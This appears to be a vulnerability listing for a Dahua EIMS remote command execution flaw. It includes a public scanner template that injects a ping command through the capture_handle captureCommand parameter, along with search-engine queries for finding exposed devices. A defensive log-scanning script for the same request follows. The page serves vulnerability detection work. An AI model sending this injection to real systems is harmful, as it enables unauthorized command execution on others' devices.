dahua-eims-rce: Dahua EIMS - Remote Command Execution

Date: 2025-08-01 | Affected software: Dahua EIMS | PoC: public

Vulnerability description

Dahua EIMS capture_handle interface allows remote command execution.

PoC code [public]

id: dahua-eims-rce

info:
  name: Dahua EIMS - Remote Command Execution
  author: DhiyaneshDk
  severity: critical
  description: |
    Dahua EIMS capture_handle interface allows remote command execution.
  reference:
    - https://github.com/wy876/POC/blob/main/%E5%A4%A7%E5%8D%8EEIMS-capture_handle%E6%8E%A5%E5%8F%A3%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
    - https://cn-sec.com/archives/2554372.html
  metadata:
    verified: true
    max-request: 1
    fofa-query: "<title>eims</title>"
    zoomeye-query: app="大华 EIMS"
  tags: dahua,rce,eims,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/config/asst/system_setPassWordValidate.action/capture_handle.action?captureFlag=true&captureCommand=ping%20{{interactsh-url}}%20index.pcap"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: regex
        regex:
          - "^success$"
# digest: 490a00463044022024a3886038e62029f1177c5fb254cdc0c203fc23bc75c4d847bb89e9829a9a6d022078aca2e49cc5060b69ab42dbbfa81fceb2ad9bfdd1b97d5d632ef5405be9c49f:922c64590222798bb761d5b6d8e72950
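
A defender-side check for the request shape the template above sends, added here as an example (it is not part of the original page or the template author's code): it scans web access logs for requests that reach capture_handle.action and surfaces any client-supplied captureCommand value for triage. The common/combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed log format: common/combined access log (ip ... "METHOD target HTTP/x" status).
REQ_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
ENDPOINT = "/capture_handle.action"  # interface named in the template

def inspect_target(target):
    """Return (reasons, command) if the request reaches the endpoint, else None."""
    parts = urlsplit(target)
    path = unquote(parts.path).lower()  # normalise case and %-encoding
    if not path.endswith(ENDPOINT):
        return None
    params = {k.lower(): v
              for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    command = params.get("capturecommand", [None])[0]  # parse_qs URL-decodes values
    reasons = []
    if command is not None:
        reasons.append("client-supplied captureCommand")
    if path.count(".action") > 1:  # same shape as the template's request path
        reasons.append("endpoint chained behind another .action path")
    return (reasons or ["request to capture_handle.action"]), command

def scan_log(lines):
    """Collect one finding per log line that reaches the endpoint."""
    findings = []
    for line in lines:
        m = REQ_RE.match(line)
        if not m:
            continue
        result = inspect_target(m.group("target"))
        if result:
            reasons, command = result
            findings.append({"ip": m.group("ip"), "status": int(m.group("status")),
                             "reasons": reasons, "command": command})
    return findings

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Aug/2025:10:00:00 +0000] "GET /index.action HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Aug/2025:10:00:05 +0000] "GET /config/asst/system_setPassWordValidate.action/capture_handle.action?captureFlag=true&captureCommand=ping%20probe.example.test%20index.pcap HTTP/1.1" 200 7',
    '198.51.100.7 - - [01/Aug/2025:10:00:09 +0000] "GET /CONFIG/asst/capture_handle.action HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A 200 status on a flagged line only shows that the request was served; confirming execution requires host-side evidence such as process or DNS logs.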
